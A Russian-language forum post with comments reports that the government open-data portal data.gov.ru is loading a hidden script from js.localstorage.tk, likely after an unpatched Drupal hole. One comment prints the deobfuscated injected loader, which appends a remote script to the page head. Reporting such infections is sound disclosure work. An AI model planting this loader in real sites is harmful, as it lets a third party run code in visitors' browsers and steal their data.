Пока янки негодуют и трясутся над своими информационными ресурсами, наши власти просто положили болт на безопасность. Отличный ассимитричный ответ на взломы наших систем.
Несколько дней назад в комментариях я дал комрадам ссылку на наши "открытые данные" http://data.gov.ru/ (а конкретно на http://data.gov.ru/taxonomy/term/71/datasets )
Каково же было мое удивление, когда браузер Хром выдал, что это фишинговая страница. Я проверил - действительно в заголовке страницы скрыто подключается скрипт со стороннего сайта https://js.localstorage.tk
Впринципе в этом нет ничего удивительного - сайт сделан на Drupal, который известен своей бесплатной дырявостью.
Стало интересно - когда же закроют эту уязвимость. Гугл обычно присылает предупреждения веб-мастерам, если на их страницах завелась нечисть. Прошло уже несколько дней, но ничего не поменялось. Сайт все также заражен, и вообщем то всем пофиг. Еще раз - сайт data.gov.ru - официальный правительственный домен.
Внимание - не осуществляйте авторизацию на этом сайте - ваши учетные данные могут утечь к злоумышленникам.
Ну и напоследок ложка меда - сайт js.localstorage.tk не пингуется. Но при этом не разделегирован
p# whois localstorage.tk
Domain name:
LOCALSTORAGE.TK
Organisation:
Freedom Registry, Inc.
2225 East Bayshore Road #290
Palo Alto CA 94303
United States
Phone: +1 650-681-4172
Fax: +1 650-681-4173
Domain Nameservers:
NS01.FREENOM.COM
NS02.FREENOM.COM
NS03.FREENOM.COM
NS04.FREENOM.COM
И почему наши политики не кричат что американцы highly likely взломали наш правительственный сервер? За друпал было бы конечно стыдно, но какой повод ...
Ну и делаем ставки, когда наши таки полечат сайт.
Комментарии
> сайт сделан на Drupal, который известен своей бесплатной дырявостью.
У нас тоже в основе движка Друпал, но вроде не ломали ни разу.
Куча серьезных сайтов на этой архитектуре сделано.
Возможно тут дело не в системе, а в человеческом факторе. Админ накосячил, или намеренно (при увольнении, например) нагадил.
Хабровский скриптокиди безопасность проверяет хромом, о чем вообще тут говорить? Почему это на главной. Он к примеру даже не знает о том, что у буша и обамы сайты тоже на друпал были, и что-то никто не смог поломать. Даже думаю имя этого "админа" не обиженного, а опущенного вернее говорить, известно: mentat
Высеры про Друпал, конечно, невежество, но сама новость забавна - ведь это точка входа на портал открытых данных.
Прикол в реальности в том, что это всего-лишь подозрение гугля на фишинг. Но счастья у школьнка - полные штаны.
Выглядит и впрямь предельно подозрительно - российскому ресурсу зачем на мутный штатовский сайт из черных списков данные засылать?
gov.ru домен принадлежит ФСО России. Соответственно это в их компетенции контролировать безопасность всех своих поддоменных (data.gov.ru) ресурсов.
Автору бы написать им письмо и обратить на это внимание.
У нас конечно не Будапешт, но от общения с этими ребятами я воздержусь
Вот жеж блин! Как всё-таки различается культура по отношению к безопасности в мире! На Западе денежные призы дают за взлом алгоритмов шифрования, понимая, что любая система рано или поздно может стать уязвимой и гораздо лучше узнать об этом как можно раньше, пока этим не надумали воспользоваться какие-нибудь злоумышленники. Хотя они и не сразу к этому пришли, но всё-таки пришли. А на Востоке (Будапешт - всё-таки Восточная Цэуропа) пока ещё придерживаются средневековых методов устрашения.
Это вы про грязных русских хакеров?
Нет. Про RSA Factoring Chalenge. Правда, именно эти соревнования уже 10 лет не проводятся - по той причине, что рост производительности компьютеров затормозился и взлом методом грубой силы сейчас не актуален. Но уверен, что с появлением каких-нибудь квантовых компьютеров движуха там снова возобновится. Но есть и другие менее известные конкурсы, исключающие методы грубой силы.
Тем не менее, этого достаточно для иллюстрации различий самих подходов к безопасности. А у нас бы Яровая их всех из пулемёта расстреляла.
Есть разница. Там парень продемонстрировал своими действиями, потому ему инкриминировали.
Тут стандартные предупреждения браузера без изменения даже кода страницы.
Технической поддержкой занимается вот эта мутная контора.
Контора? Скорей всего шарашкина контора
Публично за opendatasupport.ru скрывается некая "Служба поддержки Портала открытых данных РФ":
Но вот сам opendatasupport.ru домен зарегистрирован на некое частное лицо.
Еще раз, частное лицо! И видимо, служба поддержки осуществляется этим самым мутным прикормленным лицом из министерства экономики
Таки да. Согласен.
Дауненок, ты считаешь новость про то что правительственный сайт взломали и это никто не фиксит - ерундой? :) Иди прогуляйся
Для дауненка еще раз - я не проводил аудит безопасности сайта, я это заметил просто попытавшись зайти на сайт.
Если обновлять почаще, то рисков меньше
Какая прелесть.
Тихой сапой продвигается мысль о проприетарной не-дырявости.
Автору статьи не помешало бы изучить соответствующие профили IIS'а.
Шапкозакидателям не стыдно от таких новостей.
Если у него пинги отключены, зачем ему пинговаться? А вот, что он не резолвится - это хорошо.
Кстати, вот он офис этой Freedom Registry, Inc. канторы по ул. 2225 East Bayshore Road
Рядом растут берёзки
Ну, вот оно чё..
> Впринципе в этом нет ничего удивительного - сайт сделан на Drupal, который известен своей бесплатной дырявостью.
Недавно в ядре была обнаружена уязвимость. Сайт просто не обновили, чтобы закрыть её. По каким причинам - большой вопрос.
Такие уязвимости в друпале обнариживаются значительно реже, чем в джумле или вордпрессе.
> Внимание - не осуществляйте авторизацию на этом сайте - ваши учетные данные могут утечь к злоумышленникам.
В целом эта уязвимость даёт злоумышленнику полный доступ к управлению сайтом. Поэтому все данные уже утекли, если они были в базе данных.
Что касается "localstorage.tk", то его многие ругают как подхваченную заразу. См. форум. А также похожие симптомы.
Откройте исходники страниц сайта - ни чего подобного там нет. Уж очень маловероятно, что гугль САМ занимается фишингом, чтобы воровать Ваши данные или, скорее - кто-то ходит через проксю, которая искажает запрашиваемый контент или словил виря.)))))))
Там оно в скрытом виде:
Это развертывается в
"var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?mor=23"; document.head.appendChild(z);
обфусцированный js, ага
Да... верно подметили. Это уже повод для разбора. Серьезного разбора полетов. Если в течении недели не уберут - кого-то снимут с должности... обещаю!
сайт открывается, обращение к турчанскому скрипту действительно есть, но он не загружается, поскольку домен не имеет ssl-сертификата. Если владалец турчанского домена завтра поставит нормальный сертификат - одному Аллаху ведомо, что будет грузиться вместе с порталом
только .TK - это не Турция, а Токелау
ну тем более) "островные" зоны чаще всего используются мошенниками...
Немного не в этом суть. Домен занят "localstorage.tk", только вот за ним сервера нет. Возможно сервер активизируют в определенное время и только после этого запросы начнут исполнятся.
точняк, DNS не прописали...
Этот проект (data.gov.ru) видимо заброшен где-то с конца 17-го года (судя по ассоциированным с проектом форумом, соцсетями).
Сайт даже и не взломан, а просто заражен ботом, который обходил все drupal-сайты с незакрытой уязвимостью и заражал их.
Интересно, почему забросили проект
Drupal не более и не менее дырявый, чем любая другая cms. Бесплатность тут вообще-то не при чём. Да и ломают в 90% случаев не сам друпал, разработчики ядра там внимательно относятся к безопасности. Проблема - разнообразные модули, написанные жопой.
Вот поэтому всё, что нужно, забираю оттуда не браузером, а самописным скриптом с перепроверками.
Перспективный чат детектед! Сим повелеваю - внести запись в реестр самых обсуждаемых за последние 4 часа.
А в чём проблема? Это же портал открытых данных!!!
в том, что могут быть скомпрометированы данные всех пользователей этого портала. подсунуть можно что угодно, от майнера до фишинга.
Их и так можно скомпроментировать. Разместить в фейсбуке объявление, что такой-то - редиска. И все западные СМИ подхватят эту чудовищную ложь, оправдывая бомбардировку молодой Аравийской Народной Республики.
Я говорил о технической компрометации, т.е. получении доступа к пользовательским данным и ресурсам. А вы про что-то совсем другое.
Я про то, что изначально и тема смешная, и пост мой был шуткой.